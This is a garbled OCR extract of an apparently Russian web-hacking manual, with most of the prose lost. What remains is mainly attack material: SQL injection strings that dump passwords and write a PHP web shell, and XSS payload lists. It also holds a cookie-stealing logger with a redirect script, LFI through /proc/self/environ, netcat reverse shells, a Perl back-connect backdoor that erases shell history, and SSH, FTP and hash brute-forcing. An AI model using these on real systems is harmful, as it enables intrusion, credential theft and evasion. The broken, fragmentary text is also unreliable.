SQ L- , 1. ,
.
, SQ L-
:
param=l+union+select+1.2,concat(user_name.0x25, password.0x25, email),4,5,6.7.8,9,10
,11,12,13,14,15 from p_user ,1
,
, (-- /*),
. ? LIMIT,
53
.
:
ram-l+un1on+sel | ,2, concat Juser name, 0x25, password. 0x25, email) ,4,5,6,7.8,9.10
,11,12,13.14, 15 from pjjser LIMIT 07l
.
1 ( ), WHERE:
select .. .into outf^^ee ,
-.
/usr/1 I/apche/htdocs/ chmod 777 cyphor.
cyphor. ,
. nobody,
Apache, ,
. ,
, images include.
. select .. .into outfile
, SELECT, .
SQL- newmsg.php.
54
05. SQL-
:
http://1 ocalhost/webexpl1 tation_package_02/cyphor/showmsg.php?f 1d- I union selw.-t
1, concat_ws(0x3a,n1ck.password),3,4 from cyphor_users into outf 11e 7usf7lufj.il/
apache/htdocs/webexploi ta ti on_package_02/cyphor/user.t x t '
, ,
h ttp : / /1 1host/webexpl oi tat i on_package_02/cyphor / user. txt:,
(. 05.8). <
admi .
|flgMtp7/tocalhost/webexploitatior>_paclcage_02/cyphor/user.txt*Konquf' ff
Location
i.
jEdit
; |
& Location:
jf.
\ew
jo
bookmarks
11 |
Tools
gettings
Window
jttefp
-4
ad~in7ad4ERM. YJ 7j9A.
3.
. 05.8. Cyphor
, . , i i/
, ( I )
4 , ( k o i
,
2). i </,
, .
-
, o u tfH e
-.
hex. . :\
union select 1.2,3,4 :
hex( "<prex?
55
. 05.9 ,
.
lo c a tio n
Edit
Qo jSookmarfcs
J o e ls
S ettin g s
W in d o w
a
Location:
http^'/localhost?webexp!oitationj>ackag_02/cyphor?nefmsg php?fid=-l%20umon%20se^ect%201.hcxt',^**
HTML taps
tittered.1Links witautoma&catybegenerated.
From:
. 05.9. - hex
( ) ,
,
( ).
( ):
http://localhost/webexploitation_package_02/cyphor/showmsg.php?fid=-l union select
X3C7072653E3C3F2073797374656D28245F4745545B27636D64275D293B3F3E3C2F7072653E
.null.null.null into outfile 7usr/local/apache/htdocs/webexploitation_package_02/
cyphor/shell.php'
-
shell.php, ,
, :
http://1 !host/webexploi tati on_package_02/cyphor/shel1.php?cmd=ls+-1a
. 05.10.
,
, , S Q L . ,
.
S Q L -? .
D V L - ( :
--- sql in je ctio n ).
, .
.
(, ComicShout v.2).
56
05. SQL-
E d it
View
go
jk* \
> Loca tion :
b o o k m a rk s
J o o ls
S e ttin g s
j^ in d o w
JU Q U
<
w. |tm
t o t a l 74
d rwx rw x rwx
drw xr-xr-x
drw xr-xr-x
- * - - - - -
drw xr-xr-x
9
19
2
1
2
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
ro o t
10 0
366
281
3617
69
May
Jan
Jan
Jan
Jan
22 1 6 : 3 6
18 2 0 0 9
18 2 0 0 9 a d m in
18 2 0 0 9 c y p h o r . c s s
18 2 0 0 9 d o c
P a ge loaded.
. 05.10. -
SQL-
, , , S Q L -.
, show.php
Cyphor. :
$message_mode = 1;
:
Sid = intval(Sid):
i f ( ! Sid)
{
}
die(<brxhl>Hacking attempt!</hl>);
;...
... .
. _
'
, i d,
, . ,
.
. 05.11.
, fid,
.
, ,
. :
$text_to_check I mysql_real_escape_string ($_GET["3anpoc"]);
$text_to_check = strip_tags($text_to_check);
$text_to_check = htmlspecial chars($text_to_check);
$text_to_check = stripslashes($text_to_check);
$text_to_check = adds1ashes($text_to_check):
$_GET["] I $text_to_check;
SQL-
ag ghttp^lQcaBiQst/webexptoitationj>acka9e^02/cy^Ky/show.pilf^
lo c a tio n
E d it
V ie w
b o o k m a rk s
T o o ls
S e ttin g s
W m dc*
57
H&
u>Vn1
\
E> Lo catio n:; ord.8,id,10%20frDm%20cyphorjJSrs%20y<*t*re%20:t5=i ^
Hacking attempt!
'Page loaded.
_____
. 0 5 .1 1 . show.php
SQ L
select, union, order, char, where, from.
,
, .
(, ):
ini_set( 'displayerrors'. O'):
fe
.
h i
. ,
, , ,
SQL-. 5:
$section = $_GET[section];
$result I njysql query ('SELECT * FRCP
'tbljiame' WHERE 'section' | Ssectior. *);
if (!$result || mysql_num_rcws (Sresult) = D) {
}
. i
'
58
0 5 . SQL-
(wo
, '' ftjp ,
^, \ ),
, \ >
.
(CMS), \>
,
'' , ( (
shell,
, SQL , ,
,
.
* cam
. ,
ii\\Sv}l:
http://www,site.net/module.php?1cH-1 union select K,\userO.-l
XSS
cookie-
.
cookie ( )?
, .
cookie-
60
'
, -
XSS, , XSS ^
, - /, ( ~
. ^ -
, , 11 %'SMi &
, !.
.
, , ,
search, . 11
,
:
script.php?search-[ncKQMafl I
, html
, :
scri pt.php?search
<b>Hacked</b>
,
, I lacked.
, ''marquee - </ rquee,
, <hl> </hl>, ' /
. ,
. .
, ,,
61
- - .
<b>Hacked</b> cookie (
). , ,
,
( , %3 ):
script. php?search-fc3cmarqueefc3eHacked*3c/marqueefc3e
,
GET:
scri pt.php?search<b>Hacked</b>
,
POST, . html, P O S T .
, javascript-,
.
html-. ,
XSS-. ,
, html-,
. XSS-
.
. ,
, .
,
, ( ) .
( ).
, ,
html-, html, ,
.
, :
<script>alert('Hacked by Vasya!')</script>. XSS
Hacked by
Vasya!
62
06.
X S S - ; ,
, ,
, , .
-,
XSS
-. XSS.
name.php :
<?php
$name-$_GET[name1]:
echo "Your name is Sname :
?>
/usr/local/apache/htdocs.
form.html :
<form act1on-"name.php" method-"GET">
<1nput type-text name-name">
<input type-submit value-"0IC,>
</form>
() name. php.
http://localhost/form.html (. 06.1), (, Vasya)
.
http//localhost/formhtml>Konqueror
L o c a tio n
& (n d o w
E d it
ifiew
fio
ftookmarfcs
lo o t s
V |
Settings
Help
E>
9 9
Lo catio n :
OK
Page loaded
. 06.1. form.html
name.php , . 06.2.
, form.html
<hl>Hacked<hl>, Hacked,
. 06.3.
-, XSS
K o n q u e ro r
Edit
Location
yiew
go
bookmarks
To o ls
63
Settings
W indow
ttelp
*
1
Wm 1
lIS
w.
f i t *%
, i
Location: j| i http://localhostfname.php?name=Vasya
L.
;Page loaded.
. 06.2. name.php
lo ca tio n
dit
&4
fc
yiew
bookm arks
sS
Jo o ls
N '
Settings
W indow
Help
Your name is
Hacked
Page loaded.
64
.
gift
lo catio n
tp /rtocalhost/form ht
dit
^tew
&
bookmarks
- - >
Tools
Settings
Window
Jfclelp
& io calho st 1
Your name is
| % 3 C % 2 F s c rip t% 3 E
Hacked by Vasya
||j| :j
................................. I '
. 06.4.
.)
cookie-.
cookie,
<scri pt>alert(document.cooki e)</script>
. 06.5. cookie
, , cookie-
, .
javascript-,
cookie- - (
-), , ,
. -,
- cookie.
( D V L ),
.
<?
$query = $_SERVER['QUERY_STRING1]; //
// cookie, JavaScript *
$query .= "\";
//
$db="/tmp/cookies.txt":
// ,
// cookie
$fh-fopen ($db, "+"):
// ,
:s ($fh, "$query");
fclose ($ fh );
, XSS
65
//
// ( cookie >,i )
I I cookie
// 3d .
?>
php- cookie-
c o o k 1 e s .t x t .
, .
/usr/local/epache/htdocs stea I.php. Cookie-
/1,,
, /usr/local/apacho/htdocs nobody,
-, .
, nobody.
javascript- :
<scr1 pt>document. 1ocatl on. repl a c e (' http: 11_1_. php?com-' +document.
cookie);</scr1pt>
document.location.replace
cookie-
?com-'+document.cookie
cookie-, ,
? ( QUERY_STRING),
cookie-, ,
-. cookie
, .
cookie- -
cookies. txt.
form.html :
<scr1pt>
document. Iocatlon. rep Iace(http; I I ) oca1host/steal.php?com-'+document.cookie):
</scr1pt>
OK ,
stea I .php. /tmp
cat cookies. txt cookies .txt cookie-
(. 06.6).
base64, .
. .
, ,
- . .
66
cat
c o o k ie s ,t x t
COi?l=7fl35<19da497dS4931966aeB86C03ce9=O9d61c9bde3Q22587576O58253fcac25;%2OPHPSESSI
J3efd3bca772a907bceacdcS6de$i#$ffa;% 2O phpbb2iB ysq,l_sid=4e715bdOfad5O440fOale5bbeee
3 f b 2 5 ;%2Ophpbb2ray5ql_data=a%3A0%3A%7B%7D
b t tmp # I
. 06.6. cookie-
, cookies .txt
cookie- . (,
- 15-, 03,
, ).
cookie- , 1 ( Internet
Explorer), Opera Firefox.
,
, .
( ),
, (
, html-).
. , , ,
, , , , , .
, ,
( , )
. ,
, ,
() ,
( ). - !
... ,
, html- .
, -
,
.
XSS html- .
:
<script>
67
function ShowPage(){
// page <html>
var page=docurnent.getElementById("html");
/ / CodeOfPage
var CodeOfPage=page.innerHTML;
// alertO
alert(CodeOfPage);
}
, ,
/ / , .
<script>
, <script> ?
<script> .
, , X S S . , javascript (
vbscript).
(alert),
.
, ,
:
, ;
, Internet Explorer.
, .
<>. ,
. <> refresh, CONTENT
:
< HTTP-EQUIV=refresh" CONTENT="0;url=javascript:alertI' XSS'): ">
<B0DY>. :
<B0DY BACKGROUND-"javascript:alert(' XSS')" >
OnLoad, .
javascript- :
<B0DY 0NL0AD=alert(XSS
<IMG>. SRC:
<IMG SRC=javascript: alert(XSS )">
, javascript ?
:
<IMG SRC="javascript: alert( ' XSS' ) ">
68
.
:
<IMG SRCjavascript:a!ert('XSS*)>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC="
javascript:alert(XSS'):">
VBScript:
<IMG SRC='vbscript:msgbox("XSS")'>
<STYLE>. IE , ,
:
<STYLE TYPE=''text/javascript">alert( 'XSS') ;</STYLE>
, Internet
Explorer.
<TABLE>. .
BACKGROUND, . ,
javascript-:
<TABLE BACKGROUND-"javascript:alert( ' XSS')">
<DIV>. . ,
<div> </div>, .
:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
, url () expressionC):
<DIV STYLE-"width: expression(alert('XSS'));">
<STYLE>. ,
<STYLE> </STYLE>. :
<STYLE>.XSS{background-image:ur1(
"javascript:alert('Hacked') " ) ;}</STYLE><A CLASS-XSS></A>
XSS ( X S S -),
< CLASS=XSSx/A>
:
<STYLE> type="text/css">BODY{background:url(
"javascript: al ert ( 'Hacked'))} </STYLE>
X S S -
.
<BGS0UND>. ,
javascript-:
<BGS0UND SRC-"javascript:alert XSS');">
<IMG>. .
, Interne*
Explorer. DYNSRC L0WSRC.
:
<script>
69
javascript- ;
VBScript-;
(
);
SQ L-
SQL* M ySQ L,
M S S Q I , it . 11
, , 11
, ,
SELECT UNION,
.
, * M ySQ L,
. ,
.
( -- /*),
,
. , INSERT
(. ), ,
. (.'
, , ,
. ,
,
.
, , ,
.
:
news,php?1d-l2 i l l )
, .
:
mysql.user
71
.
, ,
! 1=2, ,
1=1.
.
, ( 1=1),
( 1=2). ,
, , , ,
, .
, .
MySQL
@@version
M y S Q L .
, M y S Q L .
:
news.php?id=12 and substring(@@version,l)=4
Aversion
(=4). , ,
, 1=2.
, 4 5 .
, , M y S Q L S .
4 5 , 3. , M y S Q L 3 ,
- ,
SELECT
UNION .
mysql.user
, ,
. select *
news.php?id-12 and (select 1)=1
72
07. SQL-
, .
, '
, mysql. user:
news.php?id=12 and (SELECT 1 from mysql.user limit 0,1)*1
mysql .user, ,
, . ,
, , mysql .user, !
M y S Q L loacM i1()
0UTFILE. , *
limit 0.1,
;
.
limit.
M y SQ L S,
information_schema ,
.
,
users:
news.php?id=12 and (SELECT 1 from users limit 0.1)-l
users, .
, .
M y S Q L 4,
.
- ,
. , users
,
:
news.php?id=12 and (SELECT substring(
concat(1,password),1,1) from users limit 0,1)-1
password,
substring ( ), ,
1, password .
password, .
73
/
,
, ,
. SQL-.
(username) (password) users.
, , ! username, password,
email userid.
(username) (password) where:
news.php?id=12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where user1d-2),1,1))>100
limit 0.1.
,
,W
. , ,
/
. , select
W
substring( .1.1),
. ascii
A S C II-. > 100.
A S C II- , 100,
.
, , 100
:
news.php?i=12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where userid-2),1 .1 ))>80
, , 80.
:
news.php?id=12 and ascii(substring((SELECT concat(
username, 9x3a,password) from users where userid-2).1 .1 ))>90
, :
news.php?id=12 and ascii(substring((SELECT concat(
usernanie.0x3a. password) from users where userid-2).1 .1 ))>85
, :
news.php?id=12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where userid-2).1 .1 ))>86
, , . ,
85, 86, 86! ,
=86. , AS - (
char(86)). ,
V. , substring:
news.php?ia=12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where userid-2).2 .1 ))>100
74
07. SQL-
, 110:
news.php?id-12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where userid-2),2 ,1 ))>110
, :
news.php?id-12 and ascii(substring((SELECT concat(
username.0x3a.password) from users where userid-2),2 ,1 ))>105
:
news.php?id-12 and ascii(substring((SELECT concat(
username.0x3a,password) from users where userid=2),2,l))>103
. :
news.php?id-12 and ascii(substring((SELECT concat(
username.0x3a,password) from users where userid=2),2 ,1 ))>104
, , 104 we 105,
105. char( 105) i.
Vi. , 11
. .
( substring) , ,
, >0 . , ,
user/password .
SQL- NaboPoll
Damn Vulnerable Linux NaboPoll (
), results.php
, S Q L -. :
27...31
$res_question - mysql_query("select * from nabopoll_questions
where survey-$survey order by id"):
if ($res_question FALSE || mysql_numrows($res_question) == 0)
error($row_survey. "questions not found");
$surve.y () ,
S Q L -. ,
where .
SQL- NaboPoll
75
I ; .
mil III I; / (1 o<.'v\1host/webexploi tation_package_02/
ViwvV
W
S3* l&v iMK'h
... N
HB
1 |1 Poll
tt:v,
.........
4* jj, -1Ui>
.n
fc
ii-
. it.'U4i .-4
.H
i :iit
-i
Vi:4
11
vHMfic
vj
v S f
M l i l B l l i
v Ttot IP
IP
\+ \
L'J
? 1
v
iil' S.
. 07.1. NaboPoll
Actions ().
, ( ),
( Actions).
, 1
, . 07.2. (
http: / 11 1host/webexpl1tati on_package_02/nabopol 1/resul t .php?surv=l).
surv=l :
/**/AND/**/l-(SELECT/**/(IF((ASC11(SUBSTRING(user().1 .1 ))>125).1.0)))
S Q L -
NaboPoll. .
(/**/), , .
- SELECT AND
1, SELECT IF.
IF (1),
, (0), . ,
I , AND 1=1,
( ). ,
AND 1*0, ,
survey not found ( ). IF
: A S C II- M y S Q L (
/ 1 I1
111041 /- (
, /ihinti ,nti
mmmmr
!0
[. jpjjf | 4
i{
\. ; /,
*
#
.I
>> 14 f/Mfi
$(L $1 -|
mm
W Bmm
W/
iHll.iihiili/iritiI'tliiiii/h1111tili
iiltS;/1ilHiU'1!/j:,/,/</.'
!/'.'1
'
* Q2/n*to9potl/r*&tMpbp?WW"I
f t 81
-pse
lj
(! 1
'/^!
|1
0%(0)
HWW$Jr
4
0%(0)
1
!
0%(0)
0%(0)
Volt*#! 0
AffcWH |
AfttWif ^
1/( (J
buck
fiM/ictK'iby
'IA1
M
&J/
'^
1*
\[
07/2 NaboPoll
/wuftphp Konqueror
p i
^
^ ' (}.
IfIII ^ - \
181
1
I'I
> :ffi
% not; found
*
I
0
.1
0 1 / NaboPoll
'"j*"",
rn
SQL- NaboPoll
77
, , , 100,
( ).
, , 114. .
( SUBSTRING
2):
/**/AND/**/I(SELECT/**/( IF((ASCII(SUBSTRING(user(),2 .1 )> 1 1 4 ).1 .0 )))
, 111
( ).
, http: / /
packetstormsecurity.org/0702-exploits/nabopol 1 -sql .txt
. , (
<?), , (
, . 07.4). Ssurvey 1,
Spath :
/webexploi tati on_package_02/nabopol1
ideation
dit
yiew
(bookmarks
loots
Settings
|||| j ;.|| i { j0 l
\ Location.
Window
Help
<7
# Nabopoll Blind SQL In je ctio n Exploit
I# Download: w w w .nabocorp.coa/nabopoll/
M coded by sQcratex
# Contact: sO cratex#hotw il, com
. /I
e rror^repo rting fO );
in i_s e t ( "m ax^executlon^tim e", 0) |
/ / ju s t change the default v a l u e s ...
$ 5 rv "lo c a lh o s t "; fpath * " / p o l l " ; $port 80;
^survey " 8 M{ //y o u can verify the number entering in the s ite and viewing the results.
IS;
>
>
mW%.
>
echo "\n"$
m
I
I
UP
With
I
I
1,
IA h
iI
i
li
. 07.4. NaboPoll
nabopol 1. php, , /tmp
php nabopol 1. php.
78
07. SQL-
,
M y S Q L (. 07.5).
' *,* P ro o f o f C o n c a t E x p lo it
C"i;. % /t.;JIfi.e
r \
\. /
I f'-S T
1 '
. 0 7 .5 . NaboPoll
, , M y S Q L root@l 1host.
, S Q L -
: 0 255.
( , ),
.
, , , , ,
. .
,
load_file(), ,
, /etc/passwd.
user () :
1oad_fi1(0x2f6574632f706173737764)
. 07.6.
,
,
.
, 100 195 .
,
100 15 , 13 .
6.
MD5-X3iua,
(
, ,
). 0-9 a-f.
.
-
8.
Mb IUMd I *1 NtJAdMUJMd
f
. 07.6. NaboPoll
site.com
news. php. , sql , 5 .
.
sqlmap,
:
./sqlmap. -u "http://site.com/news.php?id=12" - id
- " ,/txt/user-agents.txt" -vl --string "Posted 3-3-2008" -e "(
SELECT concat(username.0x3a.password) from users where userid=2)"
- , , -
, ( id). -
(
user-agent = sqlmap, ). -vl
. 11 --string ,
, . , 1=1
1-2 ,
. - , ,
, SELECT .
sqlmap 5 ,
. sqlmap
(), mysql5,
. -,
07. SQL-
80
( mysql4
):
./sqlmap. -u "http://site.com/news.php?id=12 -p id
-a ",/txt/user-agents.txt" -vl --string "Posted 3-3-2008" -e "(
SELECT concat(table_schema.0x3a.table_name.0x3a.columnjiame) from
information_schema.columns where columnjiame like 0x257061737325
limit 0,1)"
sqlmap ,
magic quotes,
0x257061737325 ( ' %pass% *,
).
1imit, . ,
sqlmap ,
.
, S Q L -,
. ,
: Warning: mysql_num_rows(): supplied argument is not a valid M y S Q L
result resource in /home/site/public_html/detail.php on line 377,
, . ( ,
, id) id=29 and 1=1,
, id=29 and 1=2,
.
( 29)
,
.
Google, :
Warning: mysql_num_rows(): supplied argument is not a valid M y S Q L result
resource.
site:fr,site:uk> . .
, S Q L - ,
. , ,
select , ,
. ,
.
,
, /etc/passwd:
id=29 and 1=(SELECT/**/ (IF((ASCII(SUBSTRING(
1oad_fi 1e(0x2f6574632f706173737764).1.1))<=255),1.0)))
81
( ),
,
.
NaboPoll, (
, 6).
( 9 0 % ),
,
. userO, databaseO,
version() @@version_compi le_os.
, .
, , ,
,
.
, , SELECT,
INSERT ( ) UPDATE ( )
?
, , ,
. M y S Q L benchmark(),
PostgreSQL pg_sleep(), M S S Q L delayO.
benchmark()
- .
- ,
. ,
. ,
sql-:
INSERT INTO table VALUES ( 'aaa', 'bbb', ' [sql]'. 'xxx');
table aaa , 'bbb', 'sql' ' '.
sql ,
sql-. select
( ):
INSERT INTO table VALUES ('aaa'. 'bbb', '[ ' OR l=if(ascii(lower(substring(
(select user from mysql.user limit 1),1,1)>0, benchmark
999999,md5(now())),1), 'h a c k e d ')/*]'. 'xxx'):
if, , ,
benchmark, -1.
select
mysql .user, ,
82
07. SQL-
, A S C II-, 0.
, benchmark
( benchmark 999 999 M D 5 -X 3 in
). ,
(/*), hacked.
,
255:
INSERT INTO table VALUES ('aaa', bbb'. '[
' OR l=if(ascii(lower(substring((
select user from mysql.user limit 1),1.1)>255, benchmark(
999999,md5(now())).l) ). hacked ) /* ] . 'xxx'):
,
, .
,
. !
,
, ,
.
benchmark
:
benchmark .
.
.
32- .
.
benchmark ( 999 999)
.
.
benchmark ,
50
.
, .
/proc/self/environ
, ( http://site.com ) php-,
.
, /
, Apache , /tmp
. ?
.
/proc/self/environ.
- , . *nix /, //
self ,
.
- //sel f/environ,
. ,
Apache, /proc/self/environ.
user agent ( -).
/proc/self/environ, user-agent, :
PATH-/sb1n:/usr/sb1n:/b1n:/usr/b1n:/usr/XllR6/b1n:/usr/b1n:/bin
SERVER_A0MIN-admin@s1te.com
curl "http://s1te.com/1ndex.php7page-../../../../../../../..//
self/env1ron&cmd-php1nfo();" - "User-Agent: <?php eval(\$_GET[cmd]): ?>"
php1nfo() . /proc/self/environ
user-agent :
84
08. -
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/XllR6/bin:/usr/bin:/bin
SERVERADMI N=admi n@site.com
<?php evaK$_GET[cmd]); ?> HTTP_KEEP_AIIVE-150
, user-agent
( //self/environ
).
Apache
accessjog errorJog? ,
, . /
Apache.
:
id :
/proc/X{PID}/fd/*{FD_ID}
{PID} ( , /
proc/self/status), %{FD_ID} ( 2
7 Apache).
:
h t t p : / / s i t e . c o m / i n d e x . p h p 7 p a g e . ./proc/self/status
, {PID} 1228,
:
curl "http://site.com/index.php?page=.. / . . / . . / . . / . . / . . / . . / . .//
1228/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]): ?>"
, id , sel f:
curl "h t t p : / / s i t e . c o m / i n d e x . p h p ? p a g e - . .//
self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$J3ET[cmdl); ?>"
, self ,
id . (
Apache)
.
,
. ,
Secteam
.
85
-
, - . .
. *nix .
e-mail :
1. - .
2. - (, ),
, php-, .
3. wwwrun@l 1host,
wwwrun , http- (
www-data, nobody, www, apache, wwwdata . .).
/ var/mai 1 ( /var/spool /mai 1)
, http-.
curl:
curl "http://s1te.com/1ndex.php7page-.. / . . / . . / . . / . . / . . / . . / . ./var/mai1/
wwwrun&cmd-php1nfo();"
,
, ( -
).
CRLf
<'Ml.I1 ii.y./i
\A\\ vau Y'umiMin n., , ,
^ l1\,
' >w |>;:
(00||0|{ -AvIiDiiV'5 | \
fSOilOiiS* 4 | | * p i i ! t
Alex)
11 (:11
100iiO hi j -Aijmii^
IT
Upochkil
III
?
.
.
.
0D.
.
OF.
10.
11.
12.
13. -
( ). ? ,
(root).
, ,
0 D
-. , -,
-, 05.
, ,
netcat ( ).
Unix ( Linux). ,
-,
( ),
D V L .
netcat :
-1 - -v - 25
- (25),
.
. -v (verbose )
-vv (very verbose ).
netcat :
- /bin/sh
1_ 25
(back connect)
. ,
/bin/sh. IP- 127.0.0.1,
:
- /bin/sh
127.0.0.1 25
,
(connect), ,
11
89
in i mi /i . i n/ ( i , v 0 0 1 1 | :
0 W-
I TVV ?
on (my) ft in
m m i h tffl b, fm H i M l
ifi
0rowps*98(nobody),99(nogreap)
* I
uwv
mset fefe w H
i owr ?
|# OA i I // ^ ^ netcat
I *
fff
ff
-
/
i< Enter
/
I
( I )
..
)# I / I/ ;ii. ^ 25.
||1
},* ^
, , ,..-
*0
,
nobody.
netcat:
- //sh
127.0.0.1
25
11 Enter .
:
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1]
, netcat (
) netcat (
).
id , ,
nobody,
root. uname - .
- exit
Ctrl+C.
, - netcat
-?
,
; -
91
- Perl,
. http:/ /
otaku-studios.com/showthread.php/72978-Perl -Backconnect
. :
#!/usr/b1n/perl
use 10::Socket:
Ssystem
- /bin/bash';
$ARGC-@ARGV:
print "IHS BACK-CONNECT BACKD00R\n\n ;
1f ($ARGC!-2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket:
use F1leHandle:
socket(SOCKET, PF_INET, S0CK_STREAM, getprotobyname(tcp )) or die print "[-] Unable
to Resolve Host\n";
connect(SOCKET, sockaddr_1n($ARGV[l], inet_aton($ARGV[0]))) or die print "[-] Unable
to Connect Host\n";
print "[*] Resolving HostName\n":
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
S0CKET->autof1ush();
open(STDIN. ">&S0CKET");
open(STDOUT,">&S0CKET");
open(STDERR,">&S0CKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE: unset SAVEHIST:echo -- Systeminfo --: uname -a:echo:
echo
User info --; 1d; echo: echo -- Directory---; pwd:echo: echo -- Shell -system($system):
#E0F
Kate, ,
( ) /tmp
bc.pl.
, .
, , su nobody.
, .
:
chmod 755 /tmp/bc.pl
, , (
Enter):
nc -1 -n -vv - 25
:
/tmp/bc.pl 127.0.0.1
25
. * tyna
92
* nt
v y
lUUtUftfl tMj
^ >5
oack cqnwct m
SyttVUnfftM*
iliittii
i m M i 1 m /i m %
gitMWnogmip) a m ^ M t n o M y )
Directory**
/root
%. Jm ..
.
/ i
u i >>< .<
1] pwcl)
|<:y.;ii,i,;rr , 1 1
unset HISTFILE
unset SAVFHIST
. /
(|>
.bash^history.
, , .
, , ,
(backdoor
, , ). ,
, ,
. 11 ,
.
11
tiup :;(icky ,
vlt w\rw\rwl . )
93
. - (
root) ,
drwxrwxrwx. find:
find / -type d -perm -0777 -print > /tmp/.file &
/tmp/. f i1.
02
/etc/passwd, ().
,
. ( ) (brute force ).
, .
( ), , ,
1-3% , .
/etc/passwd
( )
(
)
u s e r l:u s e r l
u s e r2 :u s e r2
u s e r N :u s e r N
Windows,
Brutus 2 ( http://www.hoobie.net/brutiis).
, - PuTTY ( Windows).
P u T T Y
. ,
,
, P u T T Y (. 0.1). Linux
.
21 (F T P ), 110 (P O P 3
), 23 (telnet), 22 (S S H -
S S H ). , Brutus SSH .
BruteSSH Linux Back Track 4.
P u T T Y SSH .
IP - (Host name (or IP-address))
www.site.com, .
95
I>IIV <
KeeMtttl
1
i.j |
H ill
1
uj W M o w
Mehavioui
1
Selection
CqIqui#
CoweoWofl
Data
PiuHV
1#||(
login
f SSH
Seilal
AIkhM
] |.....
Eort
22)
Connection type:
)
0 I*ln e t O Rlogjn SSH
Load
0 Serial
SaVfd Sessions
Default Settings
Load
''-K i * .......... .
j'*''
Saye
i
,
j/ !,'I jieI-le te' -I J
Open
Cancel
. O B .l. PuTTY
SSH. 11 Open ()
. login as:, ,
SSI I .
, .
127.0.0.1. ,
, .
21, 25, 110,
Port, Connection type Raw.
Open, ,
- , ,
.
Brutus (. 0 .2). ,
, ().
, 2 1 ( F T P ). FTP.
root , - ,
, , root
F T P .
I, , , Pass Mode (
) Combo List Combo File
not ; .
96
Start
Type -FTP
(127.0.01
Target
Connection Options
Port 121
Connections
I II IM M
10
Timeout
!(!
Use Proxy
10
FTP Option#
Modify sequence !
attempts
Authentication Options
Pass Mode Combo List
Delimiter ]:
Browse |
: Password
Username
| Target
0X
idle. 0 B .2 . Brutus
, .
(Morris and Gram pp).
, 20
.
200. 200
.
( ). Brutus
- words .txt.
-.
(, , , ,
). (,
, , , . .).
97
wa a a m a m m m
List of Users
Password
Directory Access
I Anonymous
J12345
!q u em p \~
Root Directory
Ic a t e m p C
;
|
'V EF
I
fo
Files
r~
New User
Copy User
Rename User
Directory
File for W elcom e Message
D elete User
Save
J%
Close
* Brutus p i
File
Tools
Target
(January /0 0 0 )
Help
(127 0.0.1
Start
Type jFTP
Stop
Deer
Connection Options
Port ( 5
Connection*
.
i i
Use Proxy
Define
F TP Options
Modify sequence
j attempts
Authentication Options
P
User File
Single User
fusers.txt
Browse
Defender !
Browse
**
T Password
Username
Target
FTP
127.0.0.1
12345
midnight
T /V
. 0B.4. combo.txt. !
[22:50:35]
[2250:35]
[22:50:35]
[22:50:35]
22:50:35]
#22:50:35]
22:50:35]
22:50:35]
1 2 2 5 0 :3 5 ]
922:50:35]
822:50:35]
[2250:35]
[22:50:35]
0 Users
/.
99
FTP.
, F T P -.
, Total Commander
, . Total Commander
( )
.
. ,
(deface ) .
1ndex html index. php i ndex. ol d,
index.html,
- ,
. , ,
, .
, .
F T P
P u T T Y . local host, 21
(Connection type) Raw.
F T P - , (. 0.8).
220 TYPSefc FTP Server 1-10 Heady...
. s s id n ig fc t
. 0 B .6 . FTP- P uTTY
22,
S SH ( ).
P u T T Y ( Windows), ssh ( Linux).
, /etc/passw d
Tima /b in /b a sh /b in /s h , - /s b in /n o lo g rin
bin/ fa ls e ( ,
). ,
. 21 ( F T P )
, 110 (P O P 3 ), :
Brutus , P O P 3
, FTP.
100
0B.
Brutus -.
Use Proxy Define
-,
(. 0.7). -
, .
|SOCKS (v5)
[l080
? OK I
Cancel |
. 0B.7. - Brutus
BruteSSH,
S S H .
Back Track 4 root toor.
:
/etc/init.d/networking start
, startx .
,
. ,
. toor.
/pentest/passwords/brutessh aa.txt.
m&
E d it
V ie w
B o o k m a rk s
S e ttin g s
ro o te b t:
101
H e lp
./ b ru te s s h .p y -h l i ? ;,0 .0 .1 -u ro o t -d a a .t x t
************
*
*
*.
.
f Shell
. 0 B .8 . BruteSSH
ro ot@ bt:
Session
Edit
View
Bookmarks
Settings
Help
Ppfe^/-ssh
f o b f u s .n e t >
ACCOUNT CHECK:
tfbst* I127.
lete) Password: root (1 of 4 complete) .
ACCOUNT CHECK: tssh] Host: 27.6.0.1 (1 of: 1,
le t g P a s s e d :
ACCOUNT CHECK: lssh] Host: 1 2 7 .0 ,0 .1 {1
I r t . ) Password- a l r t 13 o f 4 o . o t e t e l
-
|
ACCOUNT CHECK: tssfel H o st: 1 2 7 ;# .0 ,1 {
le t e f Password: toor (4 of 4 complete)
F0UHD: 5: | H o st: 127 /0
ro o tf3 b t * #
&
I
rooter.
., .v :
^ I :j
. 0 .9 . Medusa
, .
W in d o w s .
M edusa . 0.9.
.
*-
Unix
John The Ripper (www.openwall .com). .
? -, (,
PC-Linux) /etc/passwd,
. -,
. ,
/etc/shadow. -,
/etc/shadow,
. .
-,
( )
, root.
J T R (John The Ripper -)
Unix- , W indows.
Back Track 4, W indo w s
.
unshadow /etc/passwd /etc/shadow.
/etc/passwd, .
:
unshadow -passwd -shadow > -
passwd,
^nix-
103
John - restore
' I ,
JMhn
Shv>N passwd
john.pot,
.
, ,
.
john single (
). .
,
/etc/passwd: ,
, . ,
, ,
ced, s, .
.
john :
John --single users.txt
users.txt .
pincher pitched.
.
: password. 1st.
:
john --wordlist-password.lst users.txt
, ,
--rules:
john --rules --wordlist-password.lst users.txt
,
.
,
, . ,
, .
richard, luis. ,
:
john --incremental:alnum users.txt
alnum ( ).
( --i ncrementa 1) all (--1ncremental: 11),
104
, )#</*
!! (<),
(alpha). & 113 /.
, * , ?
titanic.
.
(-) (
